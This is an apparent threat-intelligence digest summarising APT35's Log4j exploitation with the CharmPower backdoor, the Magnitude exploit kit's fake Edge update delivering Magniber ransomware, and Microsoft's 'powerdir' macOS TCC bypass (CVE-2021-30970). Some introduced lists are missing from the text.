Suspected Threat Actors: APT35 (aka Charming Kitten, TA453, or Phosphorus)
According to researchers, the Iranian nation-state actor groups have started widespread scanning and attempts to leverage Log4j flaw in the publicly exposed vulnerable systems in merely four days after public disclosure of the vulnerability. With rushed infrastructure, the threat actor group used open-source tools for exploitation and utilized infrastructure that was used in many of their previous attacks to carry out this operation. It allowed researchers to easily detect and attribute the activity. However, shortly after these attacks started, researchers observed a subgroup of APT35 engaged in a large-scale campaign that employed their own implementation of the exploit. The exploitation attempts were observed on approximately 150 organizations, though it is not clear how many of those were successful. Upon successfully exploiting the system vulnerable to Log4j vulnerability (CVE-2021-44228), the threat actor group deployed CharmPower – a PowerShell-based modular backdoor.
As per researchers, the threat actor group is known in the cybersecurity community for making several OpSec mistakes. Once exposed, the group tends not to put too much effort into changing their infrastructure to make attribution harder for defenders. It comes as no surprise there is significant overlaps in the code and infrastructure with previous APT35 activities.
Further, while analyzing the infrastructure used in this attack, researchers made the following observation:
Researchers have recently disclosed that attackers behind the Magnitude Exploit Kit(EK) have updated it to target Microsoft Edge users with a fake browser update. The EK uses a range of social engineering techniques and exploits users and installs ransomware. While the Magnitude EK has been known to target multiple geographies and deliver different kinds of ransomware in the past, currently they seem to target South Korean users with Magniber ransomware. A typical attack chain involves the following steps:
Historically, fake software updates have proven to be a prominent tactic employed by attackers in their campaigns for getting users into downloading malware. Often these tactics involve impersonation of a popular and well-known brand. The attackers who are also efficient social engineers, tune the messages with the right mixture of implied threat and urgency.
For years, fake Flash updates have been used by attackers to carry out web-based malware campaigns. Its popularity among attackers can be attributed to the fact that Flash was widely used, famously riddled with security flaws, and used to go undergo updates almost on a monthly basis. With the retirement of Flash, attackers had to look for other options. As such web browser is an ideal candidate for attackers since it maintains a frenetic update schedule and is widely used.
In the past, Flash and Internet Explorer vulnerabilities have been extensively targeted by Magnitude. However, changes in the software landscape force attackers to adapt. For example, the exploitation of sandbox escapes vulnerability in the Chromium-based browsers in late 2021.
The attacker behind the Magnitude regularly updated the EK with fresh attacks. Researchers highlight that the fake Edge browser update seems to be added in the last few weeks.
Microsoft has recently disclosed details on a new macOS vulnerability dubbed “powerdir,” and identified as CVE-2021-30970. The vulnerability could allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology resulting in unauthorized access to a user’s protected data. Introduced in 2012 on macOS Mountain Lion, the TCC essentially helps users to configure the privacy settings of their apps. To protect TCC, Apple implanted controls that prevented unauthorized code execution and enforced a policy that restricted access to TCC to only apps that had full disk access. Microsoft uncovered that it is possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests.
If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data. For example, the attacker could hijack an app installed on the device—or install their own malicious app—and access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen.
There have been the following previously reported vulnerabilities that allowed bypassing TCC technology:
A similar exploit to the “first POC exploit” from Microsoft to plant a fake TCC database file and change the user’s home directory using the Directory Services command-line utility was presented at BlackHat USA 2021 in August. However, after the Monterey release, Microsoft used a “second POC exploit” to demonstrate the vulnerability.